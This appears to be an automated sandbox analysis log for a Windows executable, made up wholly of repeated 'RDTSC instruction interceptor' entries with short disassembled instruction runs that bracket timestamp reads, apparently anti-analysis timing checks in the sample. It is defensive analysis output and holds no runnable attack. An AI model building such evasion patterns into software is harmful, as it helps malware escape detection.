Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5B99A second address: C5B9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5B9A0 second address: C5B9BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F873 second address: C5F879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5EDE5 second address: C5EE0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FC9D8BCC173h 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FC9D8BCC166h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5EF83 second address: C5EF98 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007FC9D915F4B6h 0x00000009 jnc 00007FC9D915F4B6h 0x0000000f pop esi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F0B9 second address: C5F0E6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC9D8BCC187h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F0E6 second address: C5F0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F3F8 second address: C5F3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F3FC second address: C5F410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FC9D915F4B6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F410 second address: C5F414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F414 second address: C5F426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FC9D915F4BEh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F426 second address: C5F42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C63284 second address: C63288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C63288 second address: C63298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007FC9D8BCC178h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62B51 second address: C62B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC9D915F4C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62B6D second address: C62B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62B71 second address: C62B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62CD6 second address: C62CFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC9D8BCC184h 0x0000000c jmp 00007FC9D8BCC178h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62CFC second address: C62D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jne 00007FC9D915F4B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62D0C second address: C62D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62D12 second address: C62D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC9D915F4B6h 0x0000000a popad 0x0000000b jmp 00007FC9D915F4C5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62D32 second address: C62D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC16Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62D43 second address: C62D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C69FE2 second address: C69FE9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C69FE9 second address: C69FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C67FA9 second address: C67FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C67FAE second address: C67FB8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC9D915F4C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C67FB8 second address: C67FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C67FBE second address: C67FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FC9D915F4BCh 0x0000000d ja 00007FC9D915F4B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68283 second address: C6829F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC9D8BCC166h 0x00000009 jmp 00007FC9D8BCC171h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C685B4 second address: C685BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FC9D915F4B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68B43 second address: C68B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68B48 second address: C68B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BBh 0x00000007 pushad 0x00000008 je 00007FC9D915F4B6h 0x0000000e jmp 00007FC9D915F4BEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68B6C second address: C68B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC9D8BCC177h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68B8C second address: C68B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68B92 second address: C68BA6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jnc 00007FC9D8BCC166h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68E45 second address: C68E55 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68E55 second address: C68E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68E5B second address: C68E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C693A3 second address: C693A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C693A8 second address: C693CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC9D915F4C2h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FC9D915F4B8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C693CC second address: C693D8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC9D8BCC16Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C6E9AF second address: C6E9B4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C6E9B4 second address: C6E9CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D8BCC16Ch 0x00000009 pop esi 0x0000000a jo 00007FC9D8BCC16Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C6DD29 second address: C6DD5C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC9D915F4D5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FC9D915F4C4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C6DD5C second address: C6DD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C6E69F second address: C6E6A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C72EB5 second address: C72EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C72EB9 second address: C72ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC9D915F4B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FC9D915F4BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C72ECD second address: C72EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC9D8BCC16Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C72EE2 second address: C72EEC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C72EEC second address: C72EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C79F41 second address: C79F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jp 00007FC9D915F4BAh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push edi 0x00000013 jmp 00007FC9D915F4C8h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C7A246 second address: C7A24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C7A675 second address: C7A67F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC9D915F4C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C7A67F second address: C7A685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C7A685 second address: C7A6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007FC9D915F4B6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FC9D915F4C2h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC9D915F4C1h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C853B9 second address: C853C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC9D8BCC166h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C853C4 second address: C853E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D915F4C8h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C853E2 second address: C853F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C8F125 second address: C8F12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C8F12F second address: C8F13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC9D8BCC166h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C8F13A second address: C8F164 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC9D915F4D4h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C92BCA second address: C92BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C928EA second address: C928F4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC9D915F4C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C83D second address: C9C845 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C845 second address: C9C850 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FC9D915F4B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C850 second address: C9C859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C859 second address: C9C86F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007FC9D915F4D2h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C86F second address: C9C87B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C87B second address: C9C87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4C2C second address: CA4C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4C32 second address: CA4C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FC9D915F4CFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4C59 second address: CA4C60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4A42 second address: CA4A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4A48 second address: CA4A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D8BCC173h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4A60 second address: CA4A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4A65 second address: CA4AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC9D8BCC16Dh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007FC9D8BCC166h 0x00000015 push eax 0x00000016 pop eax 0x00000017 jns 00007FC9D8BCC166h 0x0000001d jmp 00007FC9D8BCC176h 0x00000022 popad 0x00000023 jmp 00007FC9D8BCC16Fh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4AB0 second address: CA4AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA6226 second address: CA6237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FC9D8BCC166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA6237 second address: CA6243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB1621 second address: CB1626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB1626 second address: CB1646 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB1646 second address: CB164B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB164B second address: CB1652 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB191D second address: CB1934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 jg 00007FC9D8BCC178h 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FC9D8BCC166h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB2058 second address: CB206E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB2B5C second address: CB2B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D8BCC16Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB75D5 second address: CB75D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB75D9 second address: CB75E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FC9D8BCC166h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB75E9 second address: CB75F3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB7227 second address: CB722D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB7363 second address: CB7369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB7369 second address: CB736E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CD500E second address: CD5012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
